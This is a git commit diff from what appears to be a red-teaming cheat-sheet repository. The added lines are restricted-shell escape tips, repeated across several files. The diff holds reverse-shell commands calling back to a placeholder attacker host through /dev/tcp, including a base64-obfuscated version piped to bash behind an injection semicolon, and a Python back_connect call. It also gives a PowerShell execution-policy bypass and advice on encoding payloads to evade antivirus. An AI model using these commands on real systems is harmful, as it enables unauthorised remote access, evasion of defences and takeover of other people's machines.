mirror of
https://github.com/Jieyab89/OSINT-Cheat-sheet.git
synced 2025-12-06 12:51:33 -08:00
change script
This commit is contained in:
@@ -18,3 +18,21 @@ sh -i >& /dev/tcp/<YOUR HOST OR IP>/<PORT> 0>&1
|
||||
```
|
||||
; echo c2ggLWkgPiYgL2Rldi90Y3AvPFlPVVIgSE9TVCBPUiBJUD4vPFBPUlQ+IDA+JjE= | base64 -d | bash;"
|
||||
```
|
||||
|
||||
## Tips escape from jails or hardening server
|
||||
|
||||
### Enum about the jail
|
||||
|
||||
```
|
||||
echo $SHELL
|
||||
echo $PATH
|
||||
env
|
||||
export
|
||||
pwd
|
||||
```
|
||||
|
||||
Source
|
||||
|
||||
- [Hacktrikcs Escaping from Jails](https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/escaping-from-limited-bash)
|
||||
- [Hacktricks github escape from jails](https://github.com/HackTricks-wiki/hacktricks/blob/master/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
|
||||
- [0xffsec restricted-shells](https://0xffsec.com/handbook/shells/restricted-shells/)
|
||||
@@ -75,10 +75,27 @@ int main(void){
|
||||
}
|
||||
```
|
||||
|
||||
*Pro tips
|
||||
### Enum about the jail
|
||||
|
||||
```
|
||||
echo $SHELL
|
||||
echo $PATH
|
||||
env
|
||||
export
|
||||
pwd
|
||||
```
|
||||
|
||||
*Windows Powershell Pro Tips
|
||||
|
||||
- If you was gett the shell, change to powershell, you can run
|
||||
|
||||
```
|
||||
powershell -ep bypass
|
||||
```
|
||||
```
|
||||
|
||||
Source
|
||||
|
||||
- [Hacktrikcs Escaping from Jails](https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/escaping-from-limited-bash)
|
||||
- [Hacktricks github escape from jails](https://github.com/HackTricks-wiki/hacktricks/blob/master/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
|
||||
- [0xffsec restricted-shells](https://0xffsec.com/handbook/shells/restricted-shells/)
|
||||
- [Hacktrikcs powershell-for-pentesters](https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters)
|
||||
@@ -18,4 +18,29 @@ https://pastebin.com/bFqVuGwv
|
||||
|
||||
```Linux
|
||||
https://pastebin.com/QsSKm2F1
|
||||
```
|
||||
```
|
||||
|
||||
### Enum about the jail
|
||||
|
||||
```
|
||||
echo $SHELL
|
||||
echo $PATH
|
||||
env
|
||||
export
|
||||
pwd
|
||||
```
|
||||
|
||||
*Windows Powershell Pro Tips
|
||||
|
||||
- If you was gett the shell, change to powershell, you can run
|
||||
|
||||
```
|
||||
powershell -ep bypass
|
||||
```
|
||||
|
||||
Source
|
||||
|
||||
- [Hacktrikcs Escaping from Jails](https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/escaping-from-limited-bash)
|
||||
- [Hacktricks github escape from jails](https://github.com/HackTricks-wiki/hacktricks/blob/master/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
|
||||
- [0xffsec restricted-shells](https://0xffsec.com/handbook/shells/restricted-shells/)
|
||||
- [Hacktrikcs powershell-for-pentesters](https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters)
|
||||
@@ -35,3 +35,27 @@ port = <YOUR LISTENER PORT>
|
||||
|
||||
back_connect(host, port)
|
||||
```
|
||||
### Enum about the jail
|
||||
|
||||
```
|
||||
echo $SHELL
|
||||
echo $PATH
|
||||
env
|
||||
export
|
||||
pwd
|
||||
```
|
||||
|
||||
*Windows Powershell Pro Tips
|
||||
|
||||
- If you was gett the shell, change to powershell, you can run
|
||||
|
||||
```
|
||||
powershell -ep bypass
|
||||
```
|
||||
|
||||
Source
|
||||
|
||||
- [Hacktrikcs Escaping from Jails](https://hacktricks.boitatech.com.br/linux-unix/privilege-escalation/escaping-from-limited-bash)
|
||||
- [Hacktricks github escape from jails](https://github.com/HackTricks-wiki/hacktricks/blob/master/linux-hardening/useful-linux-commands/bypass-bash-restrictions.md)
|
||||
- [0xffsec restricted-shells](https://0xffsec.com/handbook/shells/restricted-shells/)
|
||||
- [Hacktrikcs powershell-for-pentesters](https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters)
|
||||
@@ -12,5 +12,7 @@ Welcome to path red teaming or pentesting for OSINT, on this path there are scri
|
||||
6. Check the compiler on the target
|
||||
7. If AV is detected then you can encode into base64, url encode or try to enumerate what caused the payload to be detected such as checking functions, commands and others.
|
||||
8. Change the port listener to bigger
|
||||
9. If there is a restrictions you should to bypass
|
||||
10. If you have successfully connected with target, swtich to powershell if the Windows, if Linux switch to fully tty shell
|
||||
|
||||
## Soon will added (tamplate )
|
||||
## Soon will added (tamplate)
|
||||
Reference in New Issue
Block a user